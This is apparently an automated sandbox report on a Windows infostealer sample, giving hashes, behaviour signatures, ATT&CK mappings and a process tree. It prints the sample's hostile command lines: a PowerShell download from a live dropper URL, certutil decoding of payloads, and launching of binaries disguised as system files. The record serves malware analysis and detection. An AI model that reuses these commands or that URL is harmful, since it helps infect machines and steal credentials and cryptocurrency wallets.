Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    08-11-2020 18:07

General

  • Target

    ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe

  • Size

    1.8MB

  • MD5

    3202904112ba165a8401ef87661a1b8e

  • SHA1

    052b8ada0a42f8e62ae6252c3f9ad6288485c92d

  • SHA256

    ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723

  • SHA512

    a0619a68fb4b121c762604ebdde44ff7b9693d8b62dc4cfdd2293d0cec6198fb067726ef9561973a544e23262c14a5843ea3c3bf87de8d468bc4125f7f91a5bd

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://iplogger.org/1pzPe7

Signatures

  • Executes dropped EXE 6 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 2 IoCs
  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of WriteProcessMemory 65 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe
    "C:\Users\Admin\AppData\Local\Temp\ed2c43666baf3e2bda4d9fb8bbb46217e0226febe37b9ffea54b879a64061723.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1304
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c echo aPqmyxWPx
      2⤵
        PID:3440
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c powershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\1
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2160
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -command Start-BitsTransfer -Source https://iplogger.org/1pzPe7 -Destination C:\Users\Admin\AppData\Local\Temp\1
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1272
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c cmd < wMtueyMldwpSh.com
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1016
        • C:\Windows\SysWOW64\cmd.exe
          cmd
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2544
          • C:\Windows\SysWOW64\PING.EXE
            ping -n 1 ezgwO.pJC
            4⤵
            • Runs ping.exe
            PID:352
          • C:\Windows\SysWOW64\certutil.exe
            certutil -decode Vdfl.com Y
            4⤵
              PID:4044
            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              csrss.com Y
              4⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:3944
              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com Y
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of WriteProcessMemory
                PID:2576
                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                  6⤵
                  • Executes dropped EXE
                  • Checks processor information in registry
                  • Suspicious use of WriteProcessMemory
                  PID:2144
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\oaqgxnokah.exe"
                    7⤵
                      PID:2412
                    • C:\Windows\SysWOW64\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Local\Temp\hxsjqqmh.exe"
                      7⤵
                        PID:2584
                • C:\Windows\SysWOW64\PING.EXE
                  ping 127.0.0.1 -n 3
                  4⤵
                  • Runs ping.exe
                  PID:3596
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /c cmd < SSVJIWn.com
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2560
              • C:\Windows\SysWOW64\cmd.exe
                cmd
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2292
                • C:\Windows\SysWOW64\PING.EXE
                  ping -n 1 bzfvVJ.gwroE
                  4⤵
                  • Runs ping.exe
                  PID:4064
                • C:\Windows\SysWOW64\certutil.exe
                  certutil -decode hNsNG.com M
                  4⤵
                    PID:2820
                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
                    fontdrvhost.com M
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of WriteProcessMemory
                    PID:3500
                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com M
                      5⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of WriteProcessMemory
                      PID:2520
                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
                        6⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        • Suspicious use of FindShellTrayWindow
                        PID:204
                  • C:\Windows\SysWOW64\PING.EXE
                    ping 127.0.0.1 -n 3
                    4⤵
                    • Runs ping.exe
                    PID:200

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Credential Access

            Credentials in Files

            2
            T1081

            Discovery

            Query Registry

            2
            T1012

            System Information Discovery

            1
            T1082

            Remote System Discovery

            1
            T1018

            Collection

            Data from Local System

            2
            T1005

            Command and Control

            Web Service

            1
            T1102

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\FvaGtBY.com
              MD5

              f05a275d647c463849a793f4a7f71f52

              SHA1

              d0eef69718c1d16a380fa2b012e12f08304a046f

              SHA256

              da7cbc41e2389d26f34ff44ea4f91ba802d1c1e9452927c6cb1e1fc1f011c52a

              SHA512

              b54cfe18c4ba2be7bf4a6fb323e76743201b627feafcc042e33df672dfb61a3c29e080fa79e7da17a17090a8d89d4ccc69477945b1c6b867c59921c84a894161

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\M
              MD5

              0347e324fb878427506b6ffc5e46f66e

              SHA1

              fa0d50de9f343926c548a9657a9693f60652805c

              SHA256

              22ec3e07bdcd8d6eaeadb4ef7b1b34aa28691369fa99c32c753f8faf15bb658d

              SHA512

              9562ac6eadfe252965ca5c5a91bd50645e3ebe43fd7415d2882ba3b892cb5642f42f1a97e085a7e011f4cfae0dffdc32ade6624574f91e4c7fee1f0d6cc74c35

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\SSVJIWn.com
              MD5

              c38b261e8eafcff70de8b5e8785228fe

              SHA1

              619c651b585dcb0c4d0873a90e650b26a2c3c998

              SHA256

              527aba3ca0be4e0c85d51bc4205bb76313190cfb4d6169e45de6f3cff5f830b7

              SHA512

              041149bf75d2c3061045d359f5a1ec109610d96c92280b10378ad2873e4c1ab9d701d3216139a2fb85b38c916b88052d6fd418154423f9f4f108905bbde9b988

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vdfl.com
              MD5

              746b5a6a825ae849bc4c30673021a9b7

              SHA1

              e96f931d914bd207c0141ee66368d07c41c91020

              SHA256

              257c563c8497ef35038e2262a4a98ba5262d68ff69a3fe9d3c0a1f96bd578fcd

              SHA512

              e21bb2b8c8af5a5b47073871b3feb9f34970d7fa7b746ecf83d39d5ae4f540ac7e25641ce7bd11dff1d14195781eb6399868c952eed103f2dd5a28eff1f3a595

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Y
              MD5

              eb39fd2cb3ba6f58febc3fb85f0009aa

              SHA1

              d9e6e8da51e7db0cb6ac5d6920381b33404e419c

              SHA256

              f0edaa87bd93454585b29076a56fc6dd44b290ffb2c2f255fdb425506cc0b14e

              SHA512

              559a98620345185a47dbf9dbd3e488550f6cd1adb00f210f5bdfb7d894f5d85ebe10f01e28dd49398da95e888dfd5e40c831eb360f61368e498841baa85544cf

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\csrss.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\fontdrvhost.com
              MD5

              7098bdf41092092927874259196e5d80

              SHA1

              7ed19875c88e93fe3c0cc38b8bff56c61d0a8307

              SHA256

              140864a83fd7c075010791ea30de0acf1ec4725febb1c30dec785b7a893d8558

              SHA512

              dcb5a1e7fa194546cdf0186d949eb16a638d9f0cdef9f0f149b13e27d046d36d196e4ea7c6ae7d733eaaca31ce1ebd3b11b614ce2607729b9e97feb18e282b03

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\hNsNG.com
              MD5

              cce7c63f1535aabdaf4a9e39a4474569

              SHA1

              c9d7580a5db9fce68dcd8077e7d6ab5a049c79c6

              SHA256

              9734c779730a237aad5a367ef5a5aeaddd3c14283249b7c593b134843de38249

              SHA512

              865c430a3000e2ba66c7376e8c287369c68c3d2737a8eed6df35925ba3764d75e70eba6b615edabaffeb5009fc2b2a3234070488344a2671bdcf783656c56568

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\mGsikxxdjfKtYgWEgo.com
              MD5

              a9358bd23e30f7ae680ba7e16203c9d6

              SHA1

              200fac7d7ef5a25429501fff125dae65330a1ece

              SHA256

              fc755c8f26f7ea5a1d125be3df0c123e97a80f325cd3b4f433656c6391b1d1c1

              SHA512

              79eb9e40ce16a8f12c96311dc80c6a974ed42e3e1157c9f2369a912637ff21ea783e94bf8fa43b94715d981fddcfc0a80c5ee45bcef5af189c198ecc90943fbf

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              df4be7914c0ec7923e5740f44f629ff8

              SHA1

              84ec0080330f4d812755c901b01a3500874c9d36

              SHA256

              c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa

              SHA512

              e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              df4be7914c0ec7923e5740f44f629ff8

              SHA1

              84ec0080330f4d812755c901b01a3500874c9d36

              SHA256

              c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa

              SHA512

              e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\nslookup.exe
              MD5

              df4be7914c0ec7923e5740f44f629ff8

              SHA1

              84ec0080330f4d812755c901b01a3500874c9d36

              SHA256

              c375b41006ca84f7a3ba98e4284f714c48d98b5fba5010034825bf4713ab76fa

              SHA512

              e2c92f6b9df16431c8f83e96ae8f2a1761857248b9189e76fd1a1d2cbbfe3e46ffed7fcb7c972533245c44d77f0cefeef951442f17d3eb5e4373e838f3a86fc5

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\wMtueyMldwpSh.com
              MD5

              fd487a7ef90b1cd7211ac94d4e773478

              SHA1

              c2091875f5602effb1c2af62619027b4770b56f3

              SHA256

              3b38bbd04026882191f7bf67c2ea06cc1c63fecf0440361abb1e125c2d3a75ba

              SHA512

              1455649893c35b4d37859066404208de560fa006a4c76b5ab89396532e2d83a5148c5da85cd1546cb01275f9b70bbd9328068ad44147b3ee50b1bcf34d727392

            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\xWnAext.com
              MD5

              392e5cc019e763f0019337277db81081

              SHA1

              9402765f17c7e2b0cf15520ffef56476a855ab2c

              SHA256

              852ed04ac131800dae464471a51a7d54063dad88ce1ebab7ce22fcab66900d01

              SHA512

              4e0de123e4ff6f40bacded145bc0505a73a2cf39ff01878b8703b1dd6fc0059d4ce1e39c0d6043b389b7ecee0126e326c6e258b0bf472bf297179b3b945db553

            • memory/200-52-0x0000000000000000-mapping.dmp
            • memory/204-61-0x0000000000400000-0x00000000004A3000-memory.dmp
              Filesize

              652KB

            • memory/204-59-0x0000000000463A1F-mapping.dmp
            • memory/204-58-0x0000000000400000-0x00000000004A3000-memory.dmp
              Filesize

              652KB

            • memory/352-9-0x0000000000000000-mapping.dmp
            • memory/1016-2-0x0000000000000000-mapping.dmp
            • memory/1272-46-0x0000000009790000-0x0000000009791000-memory.dmp
              Filesize

              4KB

            • memory/1272-21-0x00000000083D0000-0x00000000083D1000-memory.dmp
              Filesize

              4KB

            • memory/1272-12-0x00000000078C0000-0x00000000078C1000-memory.dmp
              Filesize

              4KB

            • memory/1272-26-0x0000000008230000-0x0000000008231000-memory.dmp
              Filesize

              4KB

            • memory/1272-28-0x0000000009330000-0x0000000009363000-memory.dmp
              Filesize

              204KB

            • memory/1272-35-0x00000000092F0000-0x00000000092F1000-memory.dmp
              Filesize

              4KB

            • memory/1272-36-0x0000000009460000-0x0000000009461000-memory.dmp
              Filesize

              4KB

            • memory/1272-37-0x0000000009600000-0x0000000009601000-memory.dmp
              Filesize

              4KB

            • memory/1272-38-0x0000000009580000-0x0000000009581000-memory.dmp
              Filesize

              4KB

            • memory/1272-39-0x00000000095D0000-0x00000000095D1000-memory.dmp
              Filesize

              4KB

            • memory/1272-40-0x0000000009BA0000-0x0000000009BA1000-memory.dmp
              Filesize

              4KB

            • memory/1272-20-0x0000000007A50000-0x0000000007A51000-memory.dmp
              Filesize

              4KB

            • memory/1272-3-0x0000000000000000-mapping.dmp
            • memory/1272-11-0x0000000007AA0000-0x0000000007AA1000-memory.dmp
              Filesize

              4KB

            • memory/1272-45-0x0000000009700000-0x0000000009701000-memory.dmp
              Filesize

              4KB

            • memory/1272-13-0x0000000007B90000-0x0000000007B91000-memory.dmp
              Filesize

              4KB

            • memory/1272-6-0x0000000072C60000-0x000000007334E000-memory.dmp
              Filesize

              6.9MB

            • memory/1272-7-0x0000000004A70000-0x0000000004A71000-memory.dmp
              Filesize

              4KB

            • memory/1272-10-0x00000000071A0000-0x00000000071A1000-memory.dmp
              Filesize

              4KB

            • memory/1272-8-0x0000000007220000-0x0000000007221000-memory.dmp
              Filesize

              4KB

            • memory/2144-64-0x00000000004040AB-mapping.dmp
            • memory/2144-66-0x0000000000400000-0x0000000000423000-memory.dmp
              Filesize

              140KB

            • memory/2144-63-0x0000000000400000-0x0000000000423000-memory.dmp
              Filesize

              140KB

            • memory/2160-1-0x0000000000000000-mapping.dmp
            • memory/2292-43-0x0000000000000000-mapping.dmp
            • memory/2412-67-0x0000000000000000-mapping.dmp
            • memory/2520-54-0x0000000000000000-mapping.dmp
            • memory/2544-5-0x0000000000000000-mapping.dmp
            • memory/2560-41-0x0000000000000000-mapping.dmp
            • memory/2576-23-0x0000000000000000-mapping.dmp
            • memory/2584-68-0x0000000000000000-mapping.dmp
            • memory/2820-48-0x0000000000000000-mapping.dmp
            • memory/3440-0-0x0000000000000000-mapping.dmp
            • memory/3500-50-0x0000000000000000-mapping.dmp
            • memory/3596-19-0x0000000000000000-mapping.dmp
            • memory/3944-17-0x0000000000000000-mapping.dmp
            • memory/4044-15-0x0000000000000000-mapping.dmp
            • memory/4064-47-0x0000000000000000-mapping.dmp